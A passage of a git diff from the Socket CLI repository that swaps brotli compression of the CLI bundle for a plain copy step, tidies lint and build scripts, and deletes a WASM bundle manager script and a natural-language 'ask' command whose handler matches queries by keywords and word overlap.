quality). - }, -}) -const compressedSize = compressed.length - -// Write compressed file to dist/. -writeFileSync(cliBzPath, compressed) - -const compressionRatio = ((1 - compressedSize / originalSize) * 100).toFixed(1) -logger.success( - `Compressed: ${(originalSize / 1024 / 1024).toFixed(2)} MB → ${(compressedSize / 1024 / 1024).toFixed(2)} MB (${compressionRatio}% reduction)`, -) - -logger.log('') diff --git a/packages/cli-with-sentry/scripts/copy-cli.mjs b/packages/cli-with-sentry/scripts/copy-cli.mjs new file mode 100644 index 000000000..b9e5e1716 --- /dev/null +++ b/packages/cli-with-sentry/scripts/copy-cli.mjs @@ -0,0 +1,29 @@ +/** + * @fileoverview Copy build/cli.js to dist/cli.js. + * + * This script copies the CLI bundle from the build directory to dist. + */ + +import { copyFileSync, mkdirSync } from 'node:fs' +import path from 'node:path' +import { fileURLToPath } from 'node:url' + +import { getDefaultLogger } from '@socketsecurity/lib/logger' + +const __dirname = path.dirname(fileURLToPath(import.meta.url)) +const rootPath = path.join(__dirname, '..') +const buildPath = path.join(rootPath, 'build') +const distPath = path.join(rootPath, 'dist') + +const cliPath = path.join(buildPath, 'cli.js') +const distCliPath = path.join(distPath, 'cli.js') + +const logger = getDefaultLogger() + +// Ensure dist/ directory exists. +mkdirSync(distPath, { recursive: true }) + +// Copy cli.js to dist/. +copyFileSync(cliPath, distCliPath) + +logger.success('Copied cli.js to dist/') diff --git a/packages/cli-with-sentry/scripts/verify-package.mjs b/packages/cli-with-sentry/scripts/verify-package.mjs index 2ee46009f..4d7433daf 100644 --- a/packages/cli-with-sentry/scripts/verify-package.mjs +++ b/packages/cli-with-sentry/scripts/verify-package.mjs @@ -85,7 +85,7 @@ async function validate() { } // Check dist files exist and validate Sentry integration. - const distFiles = ['index.js', 'cli.js.bz', 'shadow-npm-inject.js'] + const distFiles = ['index.js', 'cli.js', 'shadow-npm-inject.js'] for (const file of distFiles) { logger.info(`Checking dist/${file}...`) const filePath = path.join(packageRoot, 'dist', file) diff --git a/packages/cli/.config/esbuild.index.config.mjs b/packages/cli/.config/esbuild.index.config.mjs index 574dbba39..f0d84f0e8 100644 --- a/packages/cli/.config/esbuild.index.config.mjs +++ b/packages/cli/.config/esbuild.index.config.mjs @@ -1,6 +1,6 @@ /** * esbuild configuration for Socket CLI index loader. - * Builds the brotli decompression loader that executes the compressed CLI. + * Builds the loader that executes the CLI bundle. */ import path from 'node:path' diff --git a/packages/cli/scripts/build.mjs b/packages/cli/scripts/build.mjs index 9fafb5b8d..47d412462 100644 --- a/packages/cli/scripts/build.mjs +++ b/packages/cli/scripts/build.mjs @@ -179,9 +179,9 @@ async function main() { args: ['.config/esbuild.inject.config.mjs'], }, { - name: 'Compress CLI', + name: 'Copy CLI to Dist', command: 'node', - args: ['scripts/compress-cli.mjs'], + args: ['scripts/copy-cli.mjs'], }, ] diff --git a/packages/cli/scripts/check.mjs b/packages/cli/scripts/check.mjs index be121da94..9844a3e62 100644 --- a/packages/cli/scripts/check.mjs +++ b/packages/cli/scripts/check.mjs @@ -7,7 +7,10 @@ import { parseArgs } from '@socketsecurity/lib-external/argv/parse' import { WIN32 } from '@socketsecurity/lib-external/constants/platform' import { getDefaultLogger } from '@socketsecurity/lib-external/logger' import { spawn } from '@socketsecurity/lib-external/spawn' -import { printFooter, printHeader } from '@socketsecurity/lib-external/stdio/header' +import { + printFooter, + printHeader, +} from '@socketsecurity/lib-external/stdio/header' const logger = getDefaultLogger() diff --git a/packages/cli/scripts/compress-cli.mjs b/packages/cli/scripts/compress-cli.mjs deleted file mode 100644 index 6d04be226..000000000 --- a/packages/cli/scripts/compress-cli.mjs +++ /dev/null @@ -1,52 +0,0 @@ -/** - * @fileoverview Compress build/cli.js with brotli to dist/cli.js.bz. - * - * This script compresses the CLI bundle to reduce npm package size - * from ~13MB to ~1.7MB (87% reduction). - * - * The compressed file is decompressed at runtime by dist/index.js. - */ - -import { mkdirSync, readFileSync, writeFileSync } from 'node:fs' -import path from 'node:path' -import { fileURLToPath } from 'node:url' -import { brotliCompressSync } from 'node:zlib' - -import { getDefaultLogger } from '@socketsecurity/lib-external/logger' - -const __dirname = path.dirname(fileURLToPath(import.meta.url)) -const rootPath = path.join(__dirname, '..') -const buildPath = path.join(rootPath, 'build') -const distPath = path.join(rootPath, 'dist') - -const cliPath = path.join(buildPath, 'cli.js') -const cliBzPath = path.join(distPath, 'cli.js.bz') - -const logger = getDefaultLogger() -logger.log('') -logger.step('Compressing CLI with brotli...') - -// Ensure dist/ directory exists. -mkdirSync(distPath, { recursive: true }) - -// Read the uncompressed CLI from build/. -const cliCode = readFileSync(cliPath) -const originalSize = cliCode.length - -// Compress with brotli (max quality for best compression). -const compressed = brotliCompressSync(cliCode, { - params: { - [0]: 11, // BROTLI_PARAM_QUALITY: 11 (max quality). - }, -}) -const compressedSize = compressed.length - -// Write compressed file to dist/. -writeFileSync(cliBzPath, compressed) - -const compressionRatio = ((1 - compressedSize / originalSize) * 100).toFixed(1) -logger.success( - `Compressed: ${(originalSize / 1024 / 1024).toFixed(2)} MB → ${(compressedSize / 1024 / 1024).toFixed(2)} MB (${compressionRatio}% reduction)`, -) - -logger.log('') diff --git a/packages/cli/scripts/copy-cli.mjs b/packages/cli/scripts/copy-cli.mjs new file mode 100644 index 000000000..58303dcea --- /dev/null +++ b/packages/cli/scripts/copy-cli.mjs @@ -0,0 +1,29 @@ +/** + * @fileoverview Copy build/cli.js to dist/cli.js. + * + * This script copies the CLI bundle from the build directory to dist. + */ + +import { copyFileSync, mkdirSync } from 'node:fs' +import path from 'node:path' +import { fileURLToPath } from 'node:url' + +import { getDefaultLogger } from '@socketsecurity/lib-external/logger' + +const __dirname = path.dirname(fileURLToPath(import.meta.url)) +const rootPath = path.join(__dirname, '..') +const buildPath = path.join(rootPath, 'build') +const distPath = path.join(rootPath, 'dist') + +const cliPath = path.join(buildPath, 'cli.js') +const distCliPath = path.join(distPath, 'cli.js') + +const logger = getDefaultLogger() + +// Ensure dist/ directory exists. +mkdirSync(distPath, { recursive: true }) + +// Copy cli.js to dist/. +copyFileSync(cliPath, distCliPath) + +logger.success('Copied cli.js to dist/') diff --git a/packages/cli/scripts/cover.mjs b/packages/cli/scripts/cover.mjs index fa215a0b2..e235968dc 100644 --- a/packages/cli/scripts/cover.mjs +++ b/packages/cli/scripts/cover.mjs @@ -26,9 +26,7 @@ const logger = getDefaultLogger() * Print a header message. */ function printHeader(message) { - logger.error( - '\n═══════════════════════════════════════════════════════', - ) + logger.error('\n═══════════════════════════════════════════════════════') logger.error(` ${message}`) logger.error('═══════════════════════════════════════════════════════\n') } diff --git a/packages/cli/scripts/lint.mjs b/packages/cli/scripts/lint.mjs index 60a18ca7d..3b3bad876 100644 --- a/packages/cli/scripts/lint.mjs +++ b/packages/cli/scripts/lint.mjs @@ -9,7 +9,10 @@ import path from 'node:path' import { isQuiet } from '@socketsecurity/lib-external/argv/flags' import { parseArgs } from '@socketsecurity/lib-external/argv/parse' import { WIN32 } from '@socketsecurity/lib-external/constants/platform' -import { getChangedFiles, getStagedFiles } from '@socketsecurity/lib-external/git' +import { + getChangedFiles, + getStagedFiles, +} from '@socketsecurity/lib-external/git' import { getDefaultLogger } from '@socketsecurity/lib-external/logger' import { spawn } from '@socketsecurity/lib-external/spawn' import { printHeader } from '@socketsecurity/lib-external/stdio/header' @@ -42,25 +45,42 @@ const CONFIG_PATTERNS = [ */ function getBiomeExcludePatterns() { try { - const biomeConfigPath = path.join(process.cwd(), 'biome.json') - if (!existsSync(biomeConfigPath)) { + // Look for biome.json in current directory or parent directories. + let currentDir = process.cwd() + let biomeConfigPath = null + + // Search up to 3 levels up for biome.json. + for (let i = 0; i < 3; i++) { + const testPath = path.join(currentDir, 'biome.json') + if (existsSync(testPath)) { + biomeConfigPath = testPath + break + } + const parentDir = path.dirname(currentDir) + if (parentDir === currentDir) { + break + } + currentDir = parentDir + } + + if (!biomeConfigPath) { return [] } const biomeConfig = JSON.parse(readFileSync(biomeConfigPath, 'utf8')) const includes = biomeConfig['files']?.['includes'] ?? [] - // Extract patterns that start with '!' (exclude patterns) + // Extract patterns that start with '!' (exclude patterns). return ( includes .filter( pattern => typeof pattern === 'string' && pattern.startsWith('!'), ) - // Remove the '!' prefix + // Remove the '!' prefix. .map(pattern => pattern.slice(1)) ) } catch { - // If we can't read biome.json, return empty array + // If we can't read biome.json, return empty array. return [] } } @@ -70,15 +90,17 @@ function getBiomeExcludePatterns() { */ function isExcludedByBiome(file, excludePatterns) { for (const pattern of excludePatterns) { - // Convert glob pattern to regex-like matching - // Support **/ for directory wildcards and * for filename wildcards + // Convert glob pattern to regex-like matching. + // Support **/ for directory wildcards and * for filename wildcards. const regexPattern = pattern - // **/ matches any directory - .replace(/\*\*\//g, '.*') - // * matches any characters except / - .replace(/\*/g, '[^/]*') - // Escape dots + // Replace **/ with placeholder to avoid * being replaced later. + .replace(/\*\*\//g, '__SOCKETCLI_GLOBSTAR__') + // Escape dots for literal matching. .replace(/\./g, '\\.') + // * matches any characters except /. + .replace(/\*/g, '[^/]*') + // Replace placeholder with regex that matches any path or nothing. + .replace(/__SOCKETCLI_GLOBSTAR__/g, '(?:.*/)?') const regex = new RegExp(`^${regexPattern}$`) if (regex.test(file)) { diff --git a/packages/cli/scripts/verify-package.mjs b/packages/cli/scripts/verify-package.mjs index 18bb02519..55ab835af 100644 --- a/packages/cli/scripts/verify-package.mjs +++ b/packages/cli/scripts/verify-package.mjs @@ -77,7 +77,7 @@ async function validate() { } // Check dist files exist. - const distFiles = ['index.js', 'cli.js.bz', 'shadow-npm-inject.js'] + const distFiles = ['index.js', 'cli.js', 'shadow-npm-inject.js'] for (const file of distFiles) { logger.info(`Checking dist/${file}...`) const filePath = path.join(packageRoot, 'dist', file) diff --git a/packages/cli/scripts/wasm.mjs b/packages/cli/scripts/wasm.mjs deleted file mode 100644 index ff8ce5b6b..000000000 --- a/packages/cli/scripts/wasm.mjs +++ /dev/null @@ -1,355 +0,0 @@ -/** - * Socket CLI WASM Bundle Manager - * - * Unified script for building and downloading the unified WASM bundle - * containing all AI models (MiniLM, CodeT5 encoder/decoder, ONNX Runtime, Yoga). - * - * COMMANDS: - * - --build: Build WASM bundle from source (requires Python, Rust, wasm-pack) - * - --dev: Fast dev build (3-5x faster, use with --build) - * - --download: Download pre-built WASM bundle from GitHub releases - * - --help: Show this help message - * - * USAGE: - * node scripts/wasm.mjs --build # Production build - * node scripts/wasm.mjs --build --dev # Fast dev build - * node scripts/wasm.mjs --download - * node scripts/wasm.mjs --help - */ - -import { existsSync, promises as fs } from 'node:fs' -import path from 'node:path' -import { fileURLToPath } from 'node:url' - -import { getDefaultLogger } from '@socketsecurity/lib-external/logger' -import { spawn } from '@socketsecurity/lib-external/spawn' - -const __dirname = path.dirname(fileURLToPath(import.meta.url)) -const rootPath = path.join(__dirname, '..') -const externalDir = path.join(rootPath, 'external') -const outputFile = path.join(externalDir, 'socket-ai-sync.mjs') - -const GITHUB_REPO = 'SocketDev/socket-cli' -const WASM_ASSET_NAME = 'socket-ai-sync.mjs' - -/** - * Check Node.js version requirement. - */ -function checkNodeVersion() { - const nodeVersion = process.versions.node - const major = Number.parseInt(nodeVersion.split('.')[0], 10) - - if (major < 18) { - const logger = getDefaultLogger() - logger.error(' Node.js version 18 or higher is required') - logger.error(`Current version: ${nodeVersion}`) - logger.error('Please upgrade: https://nodejs.org/') - process.exit(1) - } -} - -/** - * Show help message. - */ -function showHelp() { - logger.info(` -╔═══════════════════════════════════════════════════╗ -║ Socket CLI WASM Bundle Manager ║ -╚═══════════════════════════════════════════════════╝ - -Commands: - --build Build WASM bundle from source - Requirements: Python 3.8+, Rust, wasm-pack, binaryen - Time: ~10-20 minutes (first run), ~5 minutes (subsequent) - Size: ~115MB output - - --dev Fast dev build (use with --build) - Optimizations: Minimal (opt-level=1, no LTO) - Time: ~2-5 minutes (3-5x faster than production) - Size: Similar to production (stripped) - - --download Download pre-built WASM bundle from GitHub releases - Requirements: Internet connection - Time: ~1-2 minutes - Size: ~115MB download - - --help Show this help message - -Usage: - node scripts/wasm.mjs --build # Production build - node scripts/wasm.mjs --build --dev # Fast dev build - node scripts/wasm.mjs --download - node scripts/wasm.mjs --help - -Examples: - # Build from source for production - node scripts/wasm.mjs --build - - # Fast dev build for iteration (3-5x faster) - node scripts/wasm.mjs --build --dev - - # Download pre-built bundle (for quick setup) - node scripts/wasm.mjs --download - -Optimizations: - - Cargo profiles: dev-wasm (fast) vs release (optimized) - - Thin LTO: 5-10% faster builds than full LTO - - Strip symbols: 5-10% size reduction - - wasm-opt -Oz: 5-15% additional size reduction - - Brotli compression: ~70% final size reduction - -Notes: - - The WASM bundle contains all AI models with INT4 quantization - - INT4 provides 50% size reduction with only 1-2% quality loss - - Output location: external/socket-ai-sync.mjs (~115MB) -`) -} - -/** - * Execute command and wait for completion. - */ -async function exec(command, args, options = {}) { - const result = await spawn(command, args, { - stdio: options.stdio || 'pipe', - stdioString: true, - stripAnsi: false, - ...options, - }) - - if (result.code !== 0) { - throw new Error(`Command failed with exit code ${result.code}`) - } - - return { - code: result.code ?? 0, - stderr: result.stderr ?? '', - stdout: result.stdout ?? '', - } -} - -/** - * Build WASM bundle from source. - */ -async function buildWasm() { - const isDev = process.argv.includes('--dev') - - logger.info('╔═══════════════════════════════════════════════════╗') - if (isDev) { - logger.info('║ Building WASM Bundle (Dev Mode) ║') - logger.info('║ 3-5x faster builds with minimal optimization ║') - } else { - logger.info('║ Building WASM Bundle from Source ║') - } - logger.info('╚═══════════════════════════════════════════════════╝\n') - - const convertScript = path.join(__dirname, 'wasm', 'convert-codet5.mjs') - const buildScript = path.join(__dirname, 'wasm', 'build-unified-wasm.mjs') - - // Step 1: Convert CodeT5 models to INT4. - logger.info('Step 1: Converting CodeT5 models to ONNX INT4...\n') - try { - await exec('node', [convertScript], { stdio: 'inherit' }) - } catch (e) { - logger.error('\n❌ CodeT5 conversion failed') - logger.error(`Error: ${e.message}`) - process.exit(1) - } - - // Step 2: Build unified WASM bundle. - logger.info('\nStep 2: Building unified WASM bundle...\n') - try { - const buildArgs = [buildScript] - if (isDev) { - buildArgs.push('--dev') - } - await exec('node', buildArgs, { stdio: 'inherit' }) - } catch (e) { - logger.error('\n❌ WASM bundle build failed') - logger.error(`Error: ${e.message}`) - process.exit(1) - } - - // Verify output file exists. - if (!existsSync(outputFile)) { - logger.error(`\n❌ Output file not found: ${outputFile}`) - process.exit(1) - } - - const stats = await fs.stat(outputFile) - logger.info('\n╔═══════════════════════════════════════════════════╗') - logger.info('║ Build Complete ║') - logger.info('╚═══════════════════════════════════════════════════╝\n') - logger.done(' WASM bundle built successfully') - logger.info(`✓ Output: ${outputFile}`) - logger.info(`✓ Size: ${(stats.size / 1024 / 1024).toFixed(2)} MB\n`) -} - -/** - * Get latest WASM build release from GitHub. - */ -async function getLatestWasmRelease() { - logger.info('📡 Fetching latest WASM build from GitHub...\n') - - try { - const apiUrl = `https://api.github.com/repos/${GITHUB_REPO}/releases` - const response = await fetch(apiUrl, { - headers: { - Accept: 'application/vnd.github+json', - 'User-Agent': 'socket-cli-wasm-downloader', - }, - }) - - if (!response.ok) { - throw new Error(`GitHub API request failed: ${response.statusText}`) - } - - const releases = await response.json() - - // Find the latest WASM build release (tagged with wasm-build-*). - const wasmRelease = releases.find(r => r.tag_name.startsWith('wasm-build-')) - - if (!wasmRelease) { - throw new Error('No WASM build releases found') - } - - // Find the asset. - const asset = wasmRelease.assets.find(a => a.name === WASM_ASSET_NAME) - - if (!asset) { - throw new Error( - `Asset "${WASM_ASSET_NAME}" not found in release ${wasmRelease.tag_name}`, - ) - } - - return { - asset, - name: wasmRelease.name, - tagName: wasmRelease.tag_name, - url: asset.browser_download_url, - } - } catch (e) { - logger.error(' Failed to fetch release information') - logger.error(`Error: ${e.message}`) - logger.error('\nTry building from source instead:') - logger.error('node scripts/wasm.mjs --build\n') - process.exit(1) - } -} - -/** - * Download file with progress. - */ -async function downloadFile(url, outputPath, expectedSize) { - logger.progress(' Downloading from GitHub...') - logger.substep(`URL: ${url}`) - logger.substep(`Size: ${(expectedSize / 1024 / 1024).toFixed(2)} MB\n`) - - try { - const response = await fetch(url, { - headers: { - Accept: 'application/octet-stream', - 'User-Agent': 'socket-cli-wasm-downloader', - }, - }) - - if (!response.ok) { - throw new Error(`Download failed: ${response.statusText}`) - } - - const buffer = await response.arrayBuffer() - await fs.writeFile(outputPath, Buffer.from(buffer)) - - const stats = await fs.stat(outputPath) - logger.info(`✓ Downloaded ${(stats.size / 1024 / 1024).toFixed(2)} MB`) - logger.info(`✓ Saved to ${outputPath}\n`) - } catch (e) { - logger.error(' Download failed') - logger.error(`Error: ${e.message}`) - logger.error('\nTry building from source instead:') - logger.error('node scripts/wasm.mjs --build\n') - process.exit(1) - } -} - -/** - * Download pre-built WASM bundle from GitHub releases. - */ -async function downloadWasm() { - logger.info('╔═══════════════════════════════════════════════════╗') - logger.info('║ Downloading Pre-built WASM Bundle ║') - logger.info('╚═══════════════════════════════════════════════════╝\n') - - // Check if output file already exists. - if (existsSync(outputFile)) { - const stats = await fs.stat(outputFile) - logger.warn(' WASM bundle already exists:') - logger.substep(`${outputFile}`) - logger.substep(`Size: ${(stats.size / 1024 / 1024).toFixed(2)} MB\n`) - - // Ask user if they want to overwrite (simple y/n). - logger.info('Overwrite? (y/N): ') - const answer = await new Promise(resolve => { - process.stdin.once('data', data => { - resolve(data.toString().trim().toLowerCase()) - }) - }) - - if (answer !== 'y' && answer !== 'yes') { - logger.info('\n✓ Keeping existing file\n') - return - } - - logger.info() - } - - // Get latest release info. - const release = await getLatestWasmRelease() - logger.info(`✓ Found release: ${release.name}`) - logger.substep(`Tag: ${release.tagName}\n`) - - // Ensure output directory exists. - await fs.mkdir(externalDir, { recursive: true }) - - // Download the file. - await downloadFile(release.url, outputFile, release.asset.size) - - logger.info('╔═══════════════════════════════════════════════════╗') - logger.info('║ Download Complete ║') - logger.info('╚═══════════════════════════════════════════════════╝\n') - logger.done(' WASM bundle downloaded successfully') - logger.info(`✓ Output: ${outputFile}\n`) -} - -/** - * Main entry point. - */ -async function main() { - // Check Node.js version first. - checkNodeVersion() - - const args = process.argv.slice(2) - - if (args.length === 0 || args.includes('--help') || args.includes('-h')) { - showHelp() - return - } - - if (args.includes('--build')) { - await buildWasm() - return - } - - if (args.includes('--download')) { - await downloadWasm() - return - } - - logger.error(' Unknown command\n') - showHelp() - process.exit(1) -} - -main().catch(e => { - logger.error(' Unexpected error:', e) - process.exit(1) -}) diff --git a/packages/cli/src/commands.mts b/packages/cli/src/commands.mts index 895914e44..254804d9c 100755 --- a/packages/cli/src/commands.mts +++ b/packages/cli/src/commands.mts @@ -1,11 +1,9 @@ #!/usr/bin/env node import { cmdAnalytics } from './commands/analytics/cmd-analytics.mts' -import { cmdAsk } from './commands/ask/cmd-ask.mts' import { cmdAuditLog } from './commands/audit-log/cmd-audit-log.mts' import { cmdCI } from './commands/ci/cmd-ci.mts' import { cmdConfig } from './commands/config/cmd-config.mts' -import { cmdConsole } from './commands/console/cmd-console.mts' import { cmdFix } from './commands/fix/cmd-fix.mts' import { cmdInstall } from './commands/install/cmd-install.mts' import { cmdJson } from './commands/json/cmd-json.mts' @@ -39,12 +37,10 @@ import { isSeaBinary } from './utils/sea/detect.mts' export const rootCommands = { analytics: cmdAnalytics, - ask: cmdAsk, 'audit-log': cmdAuditLog, ci: cmdCI, cdxgen: cmdManifestCdxgen, config: cmdConfig, - console: cmdConsole, dependencies: cmdOrganizationDependencies, fix: cmdFix, install: cmdInstall, diff --git a/packages/cli/src/commands/ask/cmd-ask.mts b/packages/cli/src/commands/ask/cmd-ask.mts deleted file mode 100644 index 67194fbff..000000000 --- a/packages/cli/src/commands/ask/cmd-ask.mts +++ /dev/null @@ -1,98 +0,0 @@ -import { handleAsk } from './handle-ask.mts' -import { commonFlags } from '../../flags.mts' -import { meowOrExit } from '../../utils/cli/with-subcommands.mjs' -import { InputError } from '../../utils/error/errors.mjs' -import { - getFlagApiRequirementsOutput, - getFlagListOutput, -} from '../../utils/output/formatting.mts' - -import type { - CliCommandConfig, - CliCommandContext, -} from '../../utils/cli/with-subcommands.mjs' - -export const CMD_NAME = 'ask' - -const description = 'Ask in plain English' - -const hidden = false - -export const cmdAsk = { - description, - hidden, - run, -} - -async function run( - argv: string[] | readonly string[], - importMeta: ImportMeta, - { parentName }: CliCommandContext, -): Promise { - const config: CliCommandConfig = { - commandName: CMD_NAME, - description, - hidden, - flags: { - ...commonFlags, - execute: { - type: 'boolean', - shortFlag: 'e', - default: false, - description: 'Execute the command directly', - }, - explain: { - type: 'boolean', - default: false, - description: 'Show detailed explanation', - }, - }, - help: (command, config) => ` - Usage - $ ${command} "" [options] - - API Token Requirements - ${getFlagApiRequirementsOutput(`${parentName}:${CMD_NAME}`)} - - Options - ${getFlagListOutput(config.flags)} - - Examples - $ ${command} "scan for vulnerabilities" - $ ${command} "is express safe to use" - $ ${command} "fix critical issues" --execute - $ ${command} "show production vulnerabilities" --explain - $ ${command} "optimize my dependencies" - - Tips - - Be specific about what you want - - Mention "production" or "dev" to filter - - Use severity levels: critical, high, medium, low - - Say "dry run" to preview changes - `, - } - - const cli = meowOrExit({ - argv, - config, - importMeta, - parentName, - }) - - const query = cli.input[0] - - if (!query) { - throw new InputError( - 'Please provide a question.\n\nExample: socket ask "scan for vulnerabilities"', - ) - } - - const execute = !!cli.flags['execute'] - const explain = !!cli.flags['explain'] - - await handleAsk({ - query, - execute, - explain, - }) -} diff --git a/packages/cli/src/commands/ask/handle-ask.mts b/packages/cli/src/commands/ask/handle-ask.mts deleted file mode 100644 index 34d1e752e..000000000 --- a/packages/cli/src/commands/ask/handle-ask.mts +++ /dev/null @@ -1,666 +0,0 @@ -import { promises as fs } from 'node:fs' -import path from 'node:path' - -import nlp from 'compromise' - -import { getDefaultLogger } from '@socketsecurity/lib/logger' -import { spawn } from '@socketsecurity/lib/spawn' -// Import compromise for NLP text normalization. - -import { outputAskCommand } from './output-ask.mts' -import ENV from '../../constants/env.mts' -const logger = getDefaultLogger() - -// Semantic index for fast word-overlap matching (lazy-loaded, ~3KB). -let semanticIndex: any = null - -// ONNX embedding pipeline for deep semantic matching (lazy-loaded, ~17MB model). -const embeddingPipeline: any = null -let embeddingPipelineFailure = false -const commandEmbeddings: Record = {} - -// Confidence thresholds. -const WORD_OVERLAP_THRESHOLD = 0.3 // Minimum for word overlap match. -const PATTERN_MATCH_THRESHOLD = 0.6 // If below this, try ONNX fallback. - -export interface HandleAskOptions { - query: string - execute: boolean - explain: boolean -} - -export interface ParsedIntent { - action: string - command: string[] - confidence: number - explanation: string - packageName?: string - severity?: string - environment?: string - isDryRun?: boolean -} - -/** - * Pattern matching rules for natural language. - */ -const PATTERNS = { - __proto__: null, - // Fix patterns (highest priority - action words). - fix: { - keywords: ['fix', 'resolve', 'repair', 'remediate', 'update', 'upgrade'], - command: ['fix'], - explanation: 'Applying package updates to fix GitHub security alerts', - priority: 3, - }, - // Patch patterns (high priority - specific action). - patch: { - keywords: ['patch', 'apply patch'], - command: ['patch'], - explanation: 'Directly patching code to remove CVEs', - priority: 3, - }, - // Optimize patterns (high priority - action words). - optimize: { - keywords: [ - 'optimize', - 'enhance', - 'improve', - 'replace', - 'alternative', - 'better', - ], - command: ['optimize'], - explanation: 'Replacing dependencies with Socket registry alternatives', - priority: 3, - }, - // Package safety patterns (medium priority). - package: { - keywords: [ - 'safe', - 'trust', - 'score', - 'rating', - 'quality', - 'package', - 'dependency', - ], - command: ['package', 'score'], - explanation: 'Checking package security score', - priority: 2, - }, - // Scan patterns (medium priority). - scan: { - keywords: [ - 'scan', - 'check', - 'vulnerabilit', - 'audit', - 'analyze', - 'inspect', - 'review', - ], - command: ['scan', 'create'], - explanation: 'Scanning your project for security vulnerabilities', - priority: 2, - }, - // Issues patterns (lowest priority - descriptive words). - issues: { - keywords: ['problem', 'alert', 'warning', 'concern'], - command: ['scan', 'create'], - explanation: 'Finding issues in your dependencies', - priority: 1, - }, -} as const - -/** - * Severity levels mapping. - */ -const SEVERITY_KEYWORDS = { - __proto__: null, - critical: ['critical', 'severe', 'urgent', 'blocker'], - high: ['high', 'important', 'major'], - medium: ['medium', 'moderate', 'normal'], - low: ['low', 'minor', 'trivial'], -} as const - -/** - * Environment keywords. - */ -const ENVIRONMENT_KEYWORDS = { - __proto__: null, - production: ['production', 'prod'], - development: ['development', 'dev'], -} as const - -/** - * Normalize query using NLP to handle variations in phrasing. - * Converts verbs to infinitive and nouns to singular for better matching. - */ -function normalizeQuery(query: string): string { - try { - const doc = nlp(query) - - // Normalize verbs to infinitive form: "fixing" → "fix", "scanned" → "scan". - doc.verbs().toInfinitive() - - // Normalize nouns to singular: "vulnerabilities" → "vulnerability". - doc.nouns().toSingular() - - return doc.out('text').toLowerCase() - } catch (_e) { - // Fallback to original query if NLP fails. - return query.toLowerCase() - } -} - -/** - * Lazily load the pre-computed semantic index. - * NO ML models - just word overlap + synonyms (~3KB). - */ -async function loadSemanticIndex() { - if (semanticIndex) { - return semanticIndex - } - - try { - const homeDir = ENV.HOME || ENV.USERPROFILE - if (!homeDir) { - return null - } - const indexPath = path.join( - homeDir, - '.claude/skills/socket-cli/semantic-index.json', - ) - - const content = await fs.readFile(indexPath, 'utf-8') - semanticIndex = JSON.parse(content) - - return semanticIndex - } catch (_e) { - // Semantic index not available - not a critical error. - return null - } -} - -/** - * Extract meaningful words from text (lowercase, >2 chars). - */ -function extractWords(text: string): string[] { - return text - .toLowerCase() - .replace(/[^\w\s-]/g, '') - .split(/\s+/) - .filter(w => w.length > 2) -} - -/** - * Compute word overlap score between query and command. - * Uses Jaccard similarity: |intersection| / |union|. - */ -function wordOverlap(queryWords: Set, commandWords: string[]): number { - const commandSet = new Set(commandWords) - const intersection = new Set([...queryWords].filter(w => commandSet.has(w))) - const union = new Set([...queryWords, ...commandWords]) - - return union.size === 0 ? 0 : intersection.size / union.size -} - -/** - * Find best matching command using word overlap + synonym expansion. - * Fast path - NO ML models, pure JavaScript, ~3KB overhead. - */ -async function wordOverlapMatch(query: string): Promise<{ - action: string - confidence: number -} | null> { - const index = await loadSemanticIndex() - if (!index || !index.commands) { - return null - } - - // Extract query words. - const queryWords = new Set(extractWords(query)) - - if (queryWords.size === 0) { - return null - } - - let bestAction = '' - let bestScore = 0 - - // Match against each command's word index. - for (const [commandName, commandData] of Object.entries(index.commands)) { - if ( - !commandData || - typeof commandData !== 'object' || - !('words' in commandData) || - !Array.isArray(commandData.words) - ) { - continue - } - const score = wordOverlap(queryWords, commandData.words) - - if (score > bestScore) { - bestScore = score - bestAction = commandName - } - } - - // Require minimum overlap threshold. - if (bestScore < WORD_OVERLAP_THRESHOLD) { - return null - } - - return { - action: bestAction, - confidence: bestScore, - } -} - -/** - * Lazily load the ONNX embedding pipeline for deep semantic matching. - * Only loads when word-overlap matching has low confidence. - */ -async function getEmbeddingPipeline() { - if (embeddingPipeline) { - return embeddingPipeline - } - - // If we already failed to load, don't try again. - if (embeddingPipelineFailure) { - return null - } - - try { - // TEMPORARILY DISABLED: ONNX Runtime build issues. - // Load our custom MiniLM inference engine. - // This uses direct ONNX Runtime + embedded WASM (no transformers.js). - // Note: Model is optional - pattern matching works fine without it. - // const { MiniLMInference } = await import('../../utils/minilm-inference.mts') - // embeddingPipeline = await MiniLMInference.create() - // return embeddingPipeline - - // Temporarily fall back to pattern matching only. - embeddingPipelineFailure = true - return null - } catch (_e) { - // Model not available - silently fall back to pattern matching. - embeddingPipelineFailure = true - return null - } -} - -/** - * Compute cosine similarity between two vectors. - * Since our embeddings are already normalized, this is just dot product. - */ -function cosineSimilarity(a: Float32Array, b: Float32Array): number { - if (a.length !== b.length) { - return 0 - } - - let dotProduct = 0 - for (let i = 0; i < a.length; i++) { - dotProduct += (a[i] ?? 0) * (b[i] ?? 0) - } - - return dotProduct -} - -/** - * Get embedding for a text string using ONNX Runtime. - */ -async function getEmbedding(text: string): Promise { - const model = await getEmbeddingPipeline() - if (!model) { - return null - } - - try { - const result = await model.embed(text) - return result.embedding - } catch (_e) { - // Silently fail - pattern matching will handle the query. - return null - } -} - -/** - * Pre-compute embeddings for all command patterns. - */ -async function ensureCommandEmbeddings() { - if (Object.keys(commandEmbeddings).length > 0) { - return - } - - const commandDescriptions = { - __proto__: null, - fix: 'fix vulnerabilities by updating packages to secure versions', - patch: 'apply patches to remove CVEs from code', - optimize: - 'replace dependencies with better alternatives from Socket registry', - package: 'check safety score and rating of a package', - scan: 'scan project for security vulnerabilities and issues', - } as const - - for (const [action, description] of Object.entries(commandDescriptions)) { - if (description) { - // eslint-disable-next-line no-await-in-loop - const embedding = await getEmbedding(description) - if (embedding) { - commandEmbeddings[action] = embedding - } - } - } -} - -/** - * Find best matching command using ONNX embeddings. - * Fallback for when word-overlap has low confidence - slower but more accurate. - */ -async function onnxSemanticMatch(query: string): Promise<{ - action: string - confidence: number -} | null> { - await ensureCommandEmbeddings() - - const queryEmbedding = await getEmbedding(query) - if (!queryEmbedding || Object.keys(commandEmbeddings).length === 0) { - return null - } - - let bestAction = '' - let bestScore = 0 - - for (const [action, embedding] of Object.entries(commandEmbeddings)) { - const similarity = cosineSimilarity(queryEmbedding, embedding) - if (similarity > bestScore) { - bestScore = similarity - bestAction = action - } - } - - // Require minimum 0.5 similarity to use ONNX match. - if (bestScore < 0.5) { - return null - } - - return { - action: bestAction, - confidence: bestScore, - } -} - -/** - * Parse natural language query into structured intent. - */ -export async function parseIntent(query: string): Promise { - // Normalize the query to handle verb tenses, plurals, etc. - const lowerQuery = normalizeQuery(query) - - // Check for dry run. - const isDryRun = - lowerQuery.includes('dry run') 